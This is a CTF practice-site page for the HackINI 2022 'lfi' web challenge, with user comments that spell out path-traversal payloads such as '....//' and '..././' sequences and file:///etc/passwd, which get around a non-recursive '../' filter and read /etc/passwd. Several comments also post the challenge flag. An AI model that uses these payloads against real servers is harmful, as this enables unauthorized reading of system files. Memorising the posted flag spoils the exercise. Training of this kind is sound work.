lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1309
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
hbesljx 10月前

直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../

回复 1

1005667204 11月前

使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd

回复 0

18993258097 11月前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 0

菜鸡的小韩 11月前

这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可

回复 0

ABC第一深情 1年前

/?language=/etc/passwd

回复 3

曦羽unT0x1ns 1年前

直接用file:///etc/passwd居然也行 oAo

回复 0
13657809271 7月前

我这样怎么不行

回复 0

XHTX 1年前

?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子

回复 0

868954104 1年前

?language=/languages/....//....//....//....//etc/passwd

回复 0

868954104 1年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 1

yituoshi 1年前

Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol

回复 0

WriteUp

image
a2cai

2 金币

评分(1)

解题动态

ooultron 攻破了该题 3小时前
wakelzf 攻破了该题 4小时前
HF101010 攻破了该题 17小时前
ItzStarsWolf 攻破了该题 17小时前
asuka2001 攻破了该题 1天前
heping 攻破了该题 1天前
wangyihao 攻破了该题 1天前
17794432889 攻破了该题 1天前
DoubleUUU 攻破了该题 2天前
超级小白2025 攻破了该题 2天前
Daiju 攻破了该题 2天前
odup 攻破了该题 3天前
kttsy 攻破了该题 4天前
liuqj 攻破了该题 5天前
Jerrily 攻破了该题 7天前
圣西罗菜鸟 攻破了该题 8天前
Miss23 攻破了该题 8天前
丝丝鲲鹏 攻破了该题 8天前
青菜白玉汤 攻破了该题 8天前
Shury 攻破了该题 8天前
问题反馈